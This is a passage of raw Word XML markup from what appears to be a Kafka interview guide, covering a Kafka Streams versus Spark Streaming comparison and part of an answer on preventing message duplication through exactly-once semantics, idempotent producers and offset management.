      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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lastRenderedPageBreak/>
        <w:t>Low-latency applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like real-time monitoring, fraud detection, or recommendation engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD5B0F" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Lightweight, simple, and scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that need to process Kafka data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B0F30"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A292E2" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Large-scale, distributed processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where complex stream processing or integration with batch processing is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9B7E7" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Big data analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where large amounts of stream data need to be processed and combined with batch data (e.g., combining historical data with real-time data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940DD8D"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288052C0" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Ideal for real-time, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with lower operational complexity and higher throughput when Kafka is already in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF35223" w14:textId="77777777" w:rsidR="001B47F3"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6FA0D84">
          <v:rect id="_x0000_i3235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2E001" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357877A8" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F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Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an ideal solution for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time, low-latency, event-driven stream processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the Kafka ecosystem. It offers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69933415" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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eamless integration with Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41F17B" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Low latency and simpler deployment without requiring a separate cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9CC15" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Built-in fault tolerance through Kafka's replication and offset tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517717A5" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F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park Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more suitable for use cases that require </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale, complex processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>combine batch and stream processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. However, it requires a Spark cluster, comes with more latency due to micro-batching, and involves more complexity in deployment and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D302DC" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F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Thus, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> excels in scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time processing with low latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka-centric architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are needed, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is better suited for large-scale, complex stream analytics across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D3D9B" w14:textId="24E3334E"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849198B">
          <v:rect id="_x0000_i3236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA11F8E" w14:textId="3D94338E" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00542F3A" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="808" w:name="_Toc196308288"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you handle message duplication in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
    </w:p>
    <w:p w14:paraId="74E82508" w14:textId="30351D43" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Handling message duplication in Kafka is an important consideration for ensuring that your system processes messages correctly and doesn't lead to data inconsistency. Kafka provides several strategies for dealing with message duplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1A097"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1. Exactly Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA7DEC" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Kafka has built-in support for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which ensures that messages are neither lost nor processed more than once. This is the most robust approach to handle message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231DA200"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC969E" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Producer side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Producers can be configured to guarantee </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the acks=all and transactional.id properties. This ensures that the producer sends messages in a way that they are only written once to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B0337" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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onsumer side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka consumers can commit offsets in a way that ensures messages are consumed exactly once. By enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on both the producer and the consumer sides, Kafka guarantees no message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27072A53"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Kafka configuration for exactly-once semantics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF87B8" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Producer Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78368850" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154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acks=all (ensures the producer waits for acknowledgement from all in-sync replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F186989" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154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ransactional.id (enables transaction support for exactly-once delivery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46958C01" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154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nable.idempotence=true (prevents duplicate messages due to retries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228D708" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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onsumer Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE317D" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154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nable.auto.commit=false (manual offset management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D4B52" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka’s offset management system</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track the exact position of consumption and avoid consuming the same message multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F6A80"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2. Idempotent Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B55E94" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Kafka producers can be configured as </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent duplicate messages from being written to the Kafka topic, even in the case of retries due to network issues or broker failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA48CD"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7D609" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Idempotent producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that even if a message is sent multiple times (e.g., due to a retry), it will be written only once to the topic. Kafka uses a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer ID (PID)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sequence numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each message to track message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AF0F5"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Kafka configuration for an idempotent producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AAD119" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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lastRenderedPageBreak/>
        <w:t>enable.idempotence=true: This guarantees that the producer will not send duplicate messages even if network retries occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24B413"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3. Consumer Offset Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D30D0" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Message duplication can occur if a consumer reprocesses messages that it has already processed. To avoid this, you can manage offsets manually or by using Kafka's </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer offset management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E69BC3"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How to prevent duplication using offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F27FF3" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Manual Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By disabling auto-commit (enable.auto.commit=false) and manually committing offsets only after the consumer has successfully processed the message, you can ensure that no messages are reprocessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47236DB6" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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toring Offsets Outside Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, consumers might want to store offsets in an external system (e.g., a database) to track the exact point where they left off, providing more control and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534B031"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4. Deduplication at Consumer Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41580FCF" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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If </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
